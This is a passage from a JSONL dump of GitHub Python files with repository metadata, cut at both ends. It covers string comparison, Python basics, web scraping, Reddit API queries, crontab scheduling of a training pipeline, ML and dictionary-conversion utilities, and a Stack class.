token1.append(c)\n i += 1\n \n # print(token1)\n\n # * get token 2\n i = 0\n while i < n2:\n c = s2[i]\n if c.isdigit():\n numStr = ''\n while i < n2 and s2[i].isdigit():\n numStr += s2[i]\n i += 1\n token2.append(numStr)\n else:\n token2.append(c)\n i += 1\n \n # print(token2)\n\n tn1 = len(token1)\n tn2 = len(token2)\n tn = min(tn1, tn2)\n\n # * compare token1 and token 2, one by one;\n # ! The cases of > or < make decison, only cases of == pass\n for i in range(tn):\n if token1[i].isdigit() and token2[i].isdigit():\n if int(token1[i]) > int(token2[i]):\n return False\n elif int(token1[i]) < int(token2[i]):\n return True\n elif token1[i] > token2[i]:\n return False\n elif token1[i] < token2[i]:\n return True\n\n # * if all tokens are same, compare number of tokens\n # ! The cases of > or < make decison, only cases of == pass\n if tn1 > tn2:\n return False\n elif tn1 < tn2:\n return True\n\n # * if all tokens are same, number of tokens are same\n # * check leading zero number for digital tokens\n # ! The cases of > or < make decison, only cases of == pass\n for j in range(tn):\n if ( token1[j].isdigit() and token2[j].isdigit() ) and ( int(token1[j]) == int(token2[j]) ):\n if len(token1[j]) < len(token2[j]):\n return False\n elif len(token1[j]) > len(token2[j]):\n return True\n\n # * all tokens are same, number of tokens are same, MUST False\n return False\n\n\n\n\na1 = 'a'\na2 = 'a1'\na3 = 'ab'\na4 = 'ab42'\na5 = 'ab000144'\na6 = 'ab00144'\n\nr1 = alphanumericLess(a1, a2)\nprint('ex: {}, ar: {}'.format(True, r1))\n\nr2 = alphanumericLess(a2, a3)\nprint('ex: {}, ar: {}'.format(True, r2))\n\nr3 = alphanumericLess(a3, a4)\nprint('ex: {}, ar: {}'.format(True, r3))\n\nr4 = alphanumericLess(a4, a5)\nprint('ex: {}, ar: {}'.format(True, r4))\n\nr5 = alphanumericLess(a5, a6)\nprint('ex: {}, ar: {}'.format(True, r5))\n\na7 = 'x11y012'\na8 = 'x011y13'\n\nr6 = alphanumericLess(a7, a8)\nprint('ex: {}, ar: {}'.format(True, r6))\n\na9 = '0000'\na10 = '000'\nr7 = alphanumericLess(a9, a10)\nprint('ex: {}, ar: {}'.format(True, r7))\n\na11 = 'x817skjd8309218xn'\na12 = 'x817sljd8309217xn'\nr8 = alphanumericLess(a11, a12)\nprint('ex: {}, ar: {}'.format(True, r8))\n\na13 = 'a'\nr9 = alphanumericLess(a1, a13)\nprint('ex: {}, ar: {}'.format(False, r9))\n# %%\n","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C87AlphanumericaLess.py","file_name":"C87AlphanumericaLess.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38817123210","text":"def batas():\r\n print(\"======================================================================================\")\r\n\r\nx=[1,2,3]\r\nfor i in x:\r\n print(f\"untuk langkah pertama -> {i}\")\r\ny=(1,2,3)\r\n\r\nx=[\r\n (1,['a','b','c'],3),\r\n (4,5,6)\r\n]\r\n\r\nprint(x[1][1])\r\n\r\nx[0][1][2]=\"Andi\"\r\nx[0][1].append('d')\r\nprint(x)\r\nx=tuple(x)\r\nprint(x)\r\n\r\nbatas()\r\nx=[1,2,3]\r\ny=(1,2,3)\r\n#set/himpunan, no indexing\r\n#1. no indexing\r\n#2. unique element\r\n#3. set itu mutable, eleme2nya immutable (set itu bisa masukin tuple (karena immutable), tapi ga bisa masukkin array (karena mutable))\r\n\r\nz = {1,2,3,4}\r\nprint(z)\r\nprint(list(z))\r\ntest=[\r\n {\r\n \"nama\": \"farid\",\r\n \"kelas\": [\r\n \"satu\", \"dua\"\r\n ]\r\n }\r\n]\r\nprint(test)\r\nz.add('a')\r\nprint(z)\r\n# for i, j in enumerate(z):\r\n# print(f\"index {i} -> value {j}\")\r\n# #print(j)\r\n\r\n#cara akses elemen dari set\r\n# -> ubah jadi list\r\n# z=list(z); print(z[0])\r\n# -> pake looping\r\n# for i in z: print(i)\r\nbatas()\r\n# z.add(8)\r\n# print(z)\r\n# z.update([10])\r\n# print(z)\r\n# z.discard('a')\r\n# print(z)\r\nz={1,2,3,4,5,6,7,8,9}\r\nz.pop()\r\nz.pop()\r\n\r\n#to delete the set -> del z \r\nprint(z)","repo_name":"faridrah0514/JC-Data-Science","sub_path":"Module 01/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18957679047","text":"from celery_study.celery_task.celery_app import cel_app\n\n\ndef worker_start():\n from celery.bin import worker as celery_worker\n worker = celery_worker.worker(app=cel_app)\n worker.run(concurrency=4, traceback=False, loglevel='INFO', P=\"eventlet\")\n\n\nif __name__ == \"__main__\":\n worker_start()","repo_name":"bobowang2017/python_study","sub_path":"celery_study/celery_task/start_worker.py","file_name":"start_worker.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8959290607","text":"#!/usr/bin/python3\n'''\nModule containing a function that queries the Reddit API and returns the\nnumber of subscribers for a given subreddit.\nIf subreddit is given, the function returns 0\n'''\nimport requests\n\n\ndef number_of_subscribers(subreddit):\n '''\n function that queries reddit API and returns number of subscribers\n '''\n URL = 'https://api.reddit.com/r/{}/about.json'.format(subreddit)\n headers = {'user-agent': 'test_app'}\n\n response = requests.get(URL, headers=headers, allow_redirects=False)\n\n if response.status_code == 200:\n data = response.json()\n data = data.get('data')\n return data.get('subscribers', 0)\n else:\n return 0\n","repo_name":"reckafella/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35154080370","text":"# -*- coding: cp936 -*-\nimport urllib2,time,os,re,sys,getopt,string\ndef filepath(): #得到所需要的与系统时间相关的文件夹名,返回值类型为str\n now = time.localtime()\n year=str(now.tm_year)\n mon=now.tm_mon\n if mon<10:\n mon=''.join(['0',str(mon)])\n else:\n mon=str(mon)\n day=now.tm_mday\n if day<10:\n day=''.join(['0',str(day)])\n else:\n day=str(day)\n hour=now.tm_hour\n if hour<10:\n hour=''.join(['0',str(hour)])\n else:\n hour=str(hour)\n mmin=now.tm_min\n if mmin<10:\n mmin=''.join(['0',str(mmin)])\n else:\n mmin=str(mmin)\n dirname=''.join([year,mon,day,hour,mmin])\n return dirname\n\ndef webGrab(buf,path,mode):#将buf以mode的存储模式存储在本地path下\n out = open(path,mode)\n out.write(buf)\n out.close()\n \ndef makedr(title,path): #在path路径下创建名为title的文件夹,并且返回该文件夹的路径,返回值类型str\n new_path = os.path.join(path, title)\n if not os.path.isdir(new_path):\n os.makedirs(new_path)\n return new_path\n\ndef makeFolder(htmlPath): #新建与时间相关的文件夹\n title = filepath()\n new_htmlPath=makedr(title,htmlPath)#在\\tmp\\backup\\新建与系统时间相关的文件夹\n return new_htmlPath\ndef getFile(addr,path): #存储已知网页路径的文件,存储到本地path的位置,文件名为本来的名字不变\n splitPath = addr.split('/')\n fName = splitPath.pop()\n f=urllib2.urlopen(addr)\n buf=f.read()\n webGrab(buf,'%s\\\\%s'%(path,fName),'wb')\n \ndef CodeOut(startLabel,endLabel,fileNum,fileContent,fileSuffix,path):#取出相应标签内的代码\n fileContent=fileContent.split(startLabel)\n fileContent.pop(0)\n fileContent=''.join(fileContent)\n fileContent=fileContent.split(endLabel)\n fileContent.pop()\n fileContent=''.join(fileContent)\n fileName=str(fileNum)+fileSuffix\n webGrab(fileContent,'%s\\\\%s'%(path,fileName),'wb')#保存代码\n \ndef jsCode(new_htmlPath,buf):#抓取js的函数\n addrjs=re.findall('',buf,re.S)\n while addrjs!=[]:\n jsPath=makedr('js',new_htmlPath)#新建js文件夹\n singleJs=addrjs.pop()#弹出list的最后一个\n singleJs1=re.findall('http.*?\\.js',singleJs)#验证是否是.js结尾的js\n if singleJs1!=[]: #判断条件 js文件的网页路径已知\n singleJs1=''.join(singleJs1)\n getFile(singleJs1,jsPath)\n else: #是内部的js\n global jsNameNum\n jsNameNum+=1\n CodeOut('',jsNameNum,singleJs,'.js',jsPath)\n\ndef cssCode(new_htmlPath,buf):#抓取css的函数\n addrcss=re.findall('',buf,re.S)# 外部样式表\n global cssNameNum\n while addrcss!=[]:\n cssPath=makedr('css',new_htmlPath)\n singleCss=addrcss.pop()\n cssNameNum+=1\n CodeOut('',cssNameNum,singleCss,'.css',cssPath)\n addrcss2=re.findall('http.*?\\.css',buf)#为了匹配内部样式表\n if addrcss2!=[]:\n cssPath=makedr('css',new_htmlPath)\n for n in addrcss2:\n getFile(n,cssPath)\n addrcss3=re.findall(r'style=\".*?\"',buf,re.S)#为了匹配内联样式\n addrcss3=list(set(addrcss3))#删除重复的样式\n while addrcss3!=[]:\n cssPath=makedr('css',new_htmlPath)\n singleCss3=addrcss3.pop()\n cssNameNum+=1\n CodeOut('style=\\\"','\\\"',cssNameNum,singleCss3,'.css',cssPath)\n\ndef imagefile(new_htmlPath,buf):#抓取图片的函数\n addrImg=re.findall('http://.*?\\.jpe?g|http://.*?\\.png',buf)#匹配图片\n addrImg=list(set(addrImg))\n imagePath=makedr('images',new_htmlPath)\n for i in addrImg:\n getFile(i,imagePath)\n\n\nopts,args=getopt.getopt(sys.argv[1:],'hd:u:o:')#处理命令行参数\nfor op,value in opts:\n if op=='-d':\n period=string.atoi(value)\n elif op=='-u':\n htmlUrl=value\n elif op=='-o':\n htmlPath=value\nstartTime=time.time()\nstopTime=time.time()+period\nwhile True:\n while stopTime-startTime>=period:#设置循环条件\n startTime=time.time()\n jsNameNum=0 #后面用来保存内部js的文件名,为了方便,内部的js存储名为整数0-n\n cssNameNum=0\n f=urllib2.urlopen(htmlUrl)\n buf=f.read()#抓取手机搜狐的网页\n new_htmlPath=makeFolder(htmlPath)#新建与时间相关的文件夹,返回路径\n webGrab(buf,'%s\\\\souhu.html'%new_htmlPath,'w')#存储html\n jsCode(new_htmlPath,buf)#存储js\n cssCode(new_htmlPath,buf)#存储css\n imagefile(new_htmlPath,buf)#存储图片\n stopTime=time.time()\n\n\n \n \n","repo_name":"huangyi1112/sohu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"195273302","text":"import turtle\nt = turtle.Turtle()\ncount = 0\nd = 1\ndistance = int(input(\"Nhập khoảng cách\"))\nwhile count <1000:\n t.forward(d)\n t.left(10)\n count +=1\n if(count %5 ==0) :\n d+=1\n if ( t.xcor() > distance):\n break\n \nturtle.done()","repo_name":"Thaitran99/BaitapCodeGym","sub_path":"Veduongxoanoc.py","file_name":"Veduongxoanoc.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38094559628","text":"from crontab import CronTab\nimport os\nfrom barefoot_winnie.d00_utils.get_project_directory import get_project_directory\nfrom pathlib import Path\n\nhome = Path.home()\npaths = get_project_directory()\nbash_path = \"/bin/bash\"\n\n\nclass CronJobs:\n def __init__(self, username):\n sys_path = os.environ.get(\"PATH\")\n self.cron = CronTab(user=username,\n log=os.path.join(\"tmp\", \"cron.log\"))\n self.cron.env['PATH'] = sys_path\n\n def training_pipeline_job(self):\n filename = home.joinpath(\n \"barefoot_winnie\", \"src\", \"pipeline_trigger.sh\")\n print(filename)\n job = self.cron.new(\n command=f\"{bash_path} {filename} >> /tmp/pipeline.log 2>&1\", comment=\"training_pipeline\")\n job.hour.on(2)\n self.cron.write_to_user()\n\n def view_jobs(self):\n for job in self.cron:\n print(job)\n\n def view_log(self):\n for d in self.cron.log:\n print(d['pid'] + \" - \" + d['date'])\n\n def remove_all_jobs(self):\n self.cron.remove_all()\n self.cron.write()\n\n def remove_jobs_by_comment(self, job_comment):\n self.cron.remove_all(comment=job_comment)\n\n\nif __name__ == \"__main__\":\n import getpass\n username = getpass.getuser()\n cron_jobs = CronJobs(username)\n cron_jobs.remove_all_jobs()\n cron_jobs.remove_jobs_by_comment('pipeline')\n cron_jobs.training_pipeline_job()\n cron_jobs.view_jobs()\n","repo_name":"dssg/barefoot-winnie-public","sub_path":"src/cron_job.py","file_name":"cron_job.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73951027947","text":"from torch import Tensor as T\nfrom abc import ABCMeta, abstractmethod\n\nfrom ._level import _Level\nfrom .view import View\nfrom kerch import utils\n\n\nclass Level(_Level, View, metaclass=ABCMeta):\n\n @utils.extend_docstring(_Level)\n @utils.extend_docstring(View)\n def __init__(self, *args, **kwargs):\n super(Level, self).__init__(*args, **kwargs)\n\n ####################################################################################################################\n\n def solve(self, sample=None, target=None, representation=None, **kwargs) -> None:\n r\"\"\"\n Fits the model according to the input ``sample`` and output ``target``. Many models have both a primal and\n a dual formulation to be fitted.\n\n :param sample: Input sample of the model., defaults to the sample provided by the model.\n :param target: Target sample of the model, defaults to ```None``\n :param representation: Representation of the model (``\"primal\"`` or ``\"dual\"``)., defaults to ``\"dual\"``.\n\n :type sample: Matrix, optional\n :type target: Matrix or vector, optional\n :type representation: str, optional\n \"\"\"\n\n # set the sample to input (always works for the underlying kernel)\n if sample is not None:\n self._log.info(\"Setting the sample to the provided input. Possibly overwriting a previous one.\")\n self.init_sample(sample) # keeping the stochastic state if set.\n\n # verify that the output has the same dimensions\n if target is not None:\n target = utils.castf(target, tensor=True)\n same_dim = sample.shape[0] == target.shape[0]\n if not same_dim:\n self._log.error(\"The number of sample points is not consistent with the output dimensions\")\n return\n\n # solve model\n return super(Level, self).solve(sample=sample,\n target=target,\n representation=representation,\n **kwargs)\n\n ####################################################################################################################\n\n @abstractmethod\n def loss(self, representation=None) -> T:\n pass\n","repo_name":"hdeplaen/kerch","sub_path":"kerch/rkm/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74798462188","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\ndef scrape_class_names(url):\n html = urlopen(url)\n bs = BeautifulSoup(html, 'html.parser')\n class_names = []\n if 'java/lang' in url:\n for i in bs.find_all('a', {'title': 'class in java.lang'}):\n class_names.append(i.get_text())\n elif 'java/util' in url:\n for i in bs.find_all('a', {'title': 'class in java.util'}):\n class_names.append(i.get_text())\n return class_names\n","repo_name":"jeongsoolee09/Taint-Analysis","sub_path":"Code/BayesianNetwork/scrape_oracle_docs.py","file_name":"scrape_oracle_docs.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41115760426","text":"import json\n\nclass KeyStore:\n\n def __init__(self):\n self.data = {}\n self.db_path = './data/store.json'\n try:\n with open(self.db_path) as db_file:\n stored = json.load(db_file)\n for key, val in stored.items():\n self.data[key] = bytes.fromhex(val)\n except Exception as e:\n self.save()\n\n def save(self):\n with open(self.db_path, 'w') as db_file:\n data = { key: val.hex() for (key,val) in self.data.items() }\n json.dump(data, db_file)\n\n def get(self, key):\n if key in self.data:\n return self.data[key]\n return None\n\n def set(self, key, val):\n if type(val) == bytes:\n self.data[key] = val\n self.save()","repo_name":"shouko/abmlicense-proxy","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11227711276","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re, xml.sax.saxutils\nimport mdparser\n\ndef decode_from_koi(str):\n return str.decode(\"koi8-r\").encode('utf-8')\n\nparser = mdparser.MakeDictParser()\n\nparser.parser_info['version']='0.1'\nparser.parser_info['dict_name']='Apresyan.koi'\nparser.parser_info['format']='apresyan'\nparser.start()\n\ndescription=decode_from_koi(parser.f.readline())+decode_from_koi(parser.f.readline()).rstrip()\n\nparser.set_dict_info(\"basename\", \"Apresyan\")\nparser.begin()\nparser.set_dict_info('full_name', 'Новый Большой Англо-Русский Словарь под редакцией Ю.Д. Апресяна')\nparser.set_dict_info('lang_from', 'ENG')\nparser.set_dict_info('lang_to', 'RUS')\nparser.set_dict_info('description', xml.sax.saxutils.escape(description))\nparser.info()\nparser.abbrs_begin()\nabbr_mode = 1\nabbr_list = {}\nart_beg=''\nart_end=''\ndata_beg=''\ndata_end=''\n\nind_pat = re.compile(\"(?P\\w+)>\", re.UNICODE)\nex_pat = re.compile(\"_Ex:\\s+(?P[a-zA-Z0-9!\\?\\.']+[a-zA-Z0-9!\\?\\.'\\s]+)(?P\\s+)\", re.UNICODE)\nword_pat = re.compile(\"([\\w\\.-]+)\", re.UNICODE)\n\nfor line in parser.f.readlines():\n res = decode_from_koi(line)\n key, data = res.split(\" \")\n\n data = xml.sax.saxutils.escape(data)\n data = ex_pat.sub(\"\\n\\g\\g\", data)\n data = ind_pat.sub(\"\\n\\g)\", data)\n\n if abbr_mode == 1:\n abbr_list[key] = '' + key + ''\n else:\n new_data = ''\n word_list = word_pat.split(data)\n for w in word_list:\n if w in abbr_list:\n new_data = new_data + abbr_list[w]\n else:\n new_data = new_data + w\n data = new_data\n print(art_beg + '' + xml.sax.saxutils.escape(key) + '\\n' + data_beg + data.rstrip() + data_end + art_end)\n\n if key == '_яп.':\n parser.abbrs_end()\n abbr_mode = 0\n art_beg = \"\"\n art_end = \"\"\n data_beg = \"\"\n data_end = \"\"\n\nparser.end()\n","repo_name":"jdehotin/dictionary_xdxf","sub_path":"src/apresyan.py","file_name":"apresyan.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36805987759","text":"import sys\nfrom vcf_ctan import vcf_record\n\nifile = open(sys.argv[1]).readlines()\nofile = open(sys.argv[2],\"w\")\n\nsamples= [\"AC\",\"BD\",\"Commander\",\"EC2.1\",\"EC2.2\",\"EC7.1\",\"EC7.2\",\"Fleet\",\"Hindmarsh\",\"La_Trobe\",\"Scope\",\"Vlamingh\",\"W1\",\"WI4304\",\"X1\",\"barke\",\"bowman\",\"haruna_Nijo\",\"igri\",\"spontaneum_B1k-04-12\"]\n\nfor one in ifile:\n if not one.startswith(\"#\"):\n record = vcf_record(one)\n if record.filter == 1:\n if abs(record.INDEL) >= 10:\n opt = \"\\t\".join(record.OPT) + \"\\n\"\n opt = opt.replace(\"/\",\"|\")\n ofile.write(opt)\n","repo_name":"ctan2020/test","sub_path":"vcf-filter-170619.py","file_name":"vcf-filter-170619.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41232988100","text":"import sys\n\ninput = sys.stdin.readline\nn = int(input())\ninfo = [list(map(int, input().split())) for _ in range(n)]\nmax_val = 0\n\ndp = [0] * (n+1)\nfor i in range(n-1, -1, -1):\n if n < i + info[i][0]:\n dp[i] = max_val\n continue\n dp[i] = max(info[i][1] + dp[i + info[i][0]], max_val)\n max_val = dp[i]\n \nprint(dp[0])\n","repo_name":"suzyrhkr/Algorithm-PS","sub_path":"samsung-sw/퇴사.py","file_name":"퇴사.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36016523794","text":"#!/usr/bin/env python3\n\nimport os\nimport pandas as pd\nimport convbase as cb\nimport matplotlib.pyplot as plt\n\ncolumns_list =['Wavelenght', 'Absorbance', 'Normalized', 'Max wavelenght']\n\nplot_props = {\n 'title' : 'Absorption',\n 'xlabel' : 'Wavelenght [nm]',\n 'ylabel' : 'Intensity [AU]',\n}\n\ndef create_plot(x_val, y_val, file_name):\n fig = plt.figure()\n splot = fig.add_subplot(1, 1, 1)\n splot.plot(x_val, y_val, '-', label=cb.get_file_name(file_name))\n splot.set(**plot_props)\n splot.margins(x=0)\n splot.legend(loc='best', frameon=False)\n plot_file = cb.get_new_extension(file_name, 'png')\n fig.savefig(plot_file, dpi=600, bbox_inches='tight')\n\n\ndef main():\n config = cb.get_config('absconv.conf')\n data_files_list = cb.get_files_list(os.getcwd(), 'csv')\n fig_all = plt.figure()\n bx = fig_all.add_subplot(1, 1, 1)\n for data_file in data_files_list:\n try:\n print('-> Processing file: {}...'.format(data_file))\n data_sheet = pd.read_csv(data_file, names=columns_list)\n data_sheet.drop([0, 1], inplace=True)\n data_sheet.reset_index(drop=True, inplace=True)\n for column_name in columns_list[:2]:\n data_sheet[column_name] = pd.to_numeric(data_sheet[column_name])\n data_sheet['Normalized'] = cb.normalize(data_sheet['Absorbance'])\n data_sheet['Max wavelenght'][0] = data_sheet['Wavelenght'][data_sheet['Absorbance'].idxmax()]\n create_plot(data_sheet['Wavelenght'], data_sheet['Normalized'], data_file)\n bx.plot(data_sheet['Wavelenght'], data_sheet['Absorbance'], '-', label=cb.get_file_name(data_file))\n excel_file = cb.get_new_extension(data_file, 'xlsx')\n data_sheet.to_excel(excel_file)\n except Exception as e:\n print(e)\n else:\n print(' Processing sucessful, {} created.'.format(excel_file))\n bx.set(**plot_props)\n bx.margins(x=0)\n bx.legend(loc='best', frameon=False)\n fig_all.savefig('all_plots.png', dpi=600, bbox_inches='tight')\n\nif __name__ == '__main__':\n main()\n","repo_name":"memfagor/spectconv","sub_path":"absconv.py","file_name":"absconv.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35413256331","text":"#!/usr/bin/env python3\n\"\"\"\n L2 Regularization Cost module\n\"\"\"\nimport numpy as np\n\n\ndef l2_reg_cost(cost, lambtha, weights, L, m):\n \"\"\"\n Returns the L2 cost of a\n neural network\n \"\"\"\n w_new = dict()\n for k, v in weights.items():\n if k[0] == 'W':\n w_new[k] = v\n res = cost + (lambtha / (2 * m)) * np.sum([np.linalg.norm(w)\n for w in w_new.values()])\n return res\n","repo_name":"IHansen225/holbertonschool-machine_learning","sub_path":"supervised_learning/regularization/0-l2_reg_cost.py","file_name":"0-l2_reg_cost.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26387015287","text":"from pdb import set_trace as T\nimport numpy as np\nfrom scipy.misc import imread, imsave\nfrom sim.lib.Enums import Neon\nfrom skimage.color import rgb2lab, deltaE_cie76\n\nfdir = 'resource/Material/'\nfname = 'textures.png'\ntex = imread(fdir+fname)\ncolors = (\n Neon.RED, Neon.ORANGE, Neon.YELLOW,\n Neon.GREEN, Neon.MINT, Neon.CYAN,\n Neon.BLUE, Neon.PURPLE, Neon.MAGENTA,\n Neon.FUCHSIA, Neon.SPRING, Neon.SKY,\n Neon.BLOOD, Neon.BROWN, Neon.GOLD, Neon.SILVER)\ncolors = np.stack([Neon.rgb(c) for c in colors])\nsz = tex.shape[0]\nalpha = tex[:, :, 3]\ntex = tex[:, :, :3]\n\ntex = tex.reshape(-1, 1, 3)\ntex = rgb2lab(tex/255)\n\nclrs = colors.reshape(1, -1, 3)\nclrs = rgb2lab(clrs/255)\n\ndists = deltaE_cie76(tex, clrs)\n#dists = np.sum((tex - clrs)**2, 2)\ninds = np.argmin(dists, 1)\npx = np.array([colors[i] for i in inds])\npx = px.reshape(sz, sz, 3)\nimsave('tex.png', px)\n\n","repo_name":"openai/neural-mmo","sub_path":"jsuarez/tools/ColorTransform.py","file_name":"ColorTransform.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1496,"dataset":"github-code","pt":"37"} +{"seq_id":"12069299301","text":"### 첫 번쨰 풀이\nimport sys\ninput = sys.stdin.readline\nday = int(input())\ndata = []\ndp = [0] * (day + 1)\n\nfor _ in range(day):\n data.append(list(map(int, input().split())))\n\nfor i in range(day - 1, -1, -1):\n t, p = data[i][0], data[i][1]\n\n if i + t <= day:\n dp[i] = max(dp[i + 1], dp[i + t] + p)\n else:\n dp[i] = dp[i + 1]\n\nprint(dp[0])","repo_name":"SooonChang/ps-solutions","sub_path":"dongbin_na/Part3/ch16_dynamic/q33/q33.py","file_name":"q33.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18353303387","text":"import sys\nsys.setrecursionlimit(10 ** 5)\ninput = sys.stdin.readline\n\nk = int(input())\n\nhere = 2\ncnt = 2\nseq = [2]\nseq_cnt = [2]\n\nwhile cnt < k:\n here *= 2\n cnt += here\n seq.append(here)\n seq_cnt.append(cnt)\n\n# print(seq)\n# print(seq_cnt)\n\nres = \"\"\n\nfor i in range(len(seq)-1,0,-1):\n half = seq[i] / 2\n if k - seq_cnt[i-1] <= half:\n res += \"4\"\n k -= half\n else:\n res += \"7\"\n k -= seq[i]\n\nif k % 2 == 0:\n res += \"7\"\nelse:\n res += \"4\"\nprint(res)","repo_name":"tommy16102/2022-algorithm-study","sub_path":"2023/4-4/이정욱/2877_4와7.py","file_name":"2877_4와7.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"34498941536","text":"def queue_time(customers, n):\n\n #Returns the time it takes for all customers to leave a queue given a number\n #of tills n, and a list of customers with the time it takes for each customer\n #to finish at a till. The assumption is that the next customer moves straight\n #to a till as soon as it opens\n #For example [10,2,3,4] with 2 tills will take 10 units of time, since 2,3,4\n #all finish in the second till before 10 finishes.\n \n if customers == [] or n == 0:\n return 0\n elif n >= len(customers):\n return max(customers)\n else: \n tills = customers[:n]\n minimum = 0\n for c in customers[n:]:\n minimum = min(tills)\n min_idx = tills.index(minimum)\n tills[min_idx] = tills[min_idx] + c\n return max(tills)\n","repo_name":"askaross/personal-projects","sub_path":"Calculate_queuing_time.py","file_name":"Calculate_queuing_time.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40778504528","text":"from __future__ import annotations\n\nimport re\n\nfrom bs4 import BeautifulSoup\n\nfrom .util import SPACE, normalize\n\n\nMENTION_TEMPLATE = re.compile('>>[0-9]+')\nOP_TEMPLATE = re.compile(r'\\(OP\\)>?')\nEMPTY = ''\nMIN_POST_LENGTH = 0\n\nMENTION_TEMPLATE = re.compile(r'>>([0-9]+)(\\s+\\(OP\\)\\s*)?')\nPOST_ID_TEMPLATE = re.compile('m[0-9]{4,}')\nPOST_ID_HEAD_TEMPLATE = re.compile('([0-9]+).*', re.DOTALL)\n\n\nclass MissingPostIdException(Exception):\n pass\n\n\ndef post_id_to_int(post_id: str):\n return int(post_id[1:])\n\n\ndef parse_mention(mention: BeautifulSoup):\n match = MENTION_TEMPLATE.fullmatch(mention.text)\n\n if match is None:\n return None\n\n return int(match.group(1))\n\n\ndef parse_post_id(post_id: str):\n if post_id is None or len(post_id) < 1:\n return None\n\n try:\n return int(post_id)\n except ValueError:\n match = POST_ID_HEAD_TEMPLATE.fullmatch(post_id)\n\n # if post_id == '169
\\n\\t\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\t
{mention.short_description}' for mention in mentions])\n )\n\n @property\n def length(self):\n return len(self.mentions)\n\n @property\n def size(self):\n return len(self.text)\n\n @classmethod\n def from_body(cls, body: BeautifulSoup, html: BeautifulSoup = None, key = None):\n body_text = None if body is None else body.get_text(separator = SPACE)\n text = normalize(MENTION_TEMPLATE.sub(SPACE, OP_TEMPLATE.sub(SPACE, EMPTY if body_text is None else body_text)))\n if len(text) < MIN_POST_LENGTH:\n return None, None\n\n # if key == 52234659:\n # print(body)\n # print(html)\n\n if key is None:\n try:\n key = None if body is None else post_id_to_int(body['id'])\n except KeyError:\n key = None\n except ValueError:\n id_matches = POST_ID_TEMPLATE.findall(str(body))\n if len(id_matches) < 1:\n raise MissingPostIdException(f'{id_matches}')\n key = post_id_to_int(id_matches[0])\n\n # print(html)\n\n # mentions = None if html is None else html.find_all('a', {'class': 'post-reply-link'})\n # if mentions is not None:\n # mentions = [int(mention['data-num']) for mention in mentions]\n\n if html is None:\n mentions = None\n else:\n mentions = []\n\n for link in html.find_all('a'):\n mention = parse_mention(link)\n if mention is not None:\n mentions.append(mention)\n\n # for mention in html.find('div', id=f'refmap-{key}').find_all('a', {'class': 'post-reply-link'}):\n # print(mention['data-num'])\n\n return mentions, cls(text = text, id = key)\n\n @classmethod\n def from_html(cls, html: BeautifulSoup):\n body = html.find(\"blockquote\")\n\n if body is None:\n body = html.find('article')\n\n if body is None:\n body = html.find('div', {'class': 'post_comment_body'})\n\n key = html.get('postid')\n\n return cls.from_body(body, html, key = parse_post_id(key))\n","repo_name":"zeionara/much","sub_path":"much/Post.py","file_name":"Post.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14481241971","text":"class Stack:\n sizeof = 0\n def __init__(self,list = None):\n if list == None:\n self.item =[]\n else :\n self.item = list\n def push(self,i):\n self.item.append(i)\n def size(self): \n return len(self.item)\n\n def isEmpty(self):\n if self.size()==0:\n return True\n else:\n return False\n def pop(self):\n # tmp = self.item[self.size()-1]\n # del self.item[self.size()-1]\n # return tmp\n return 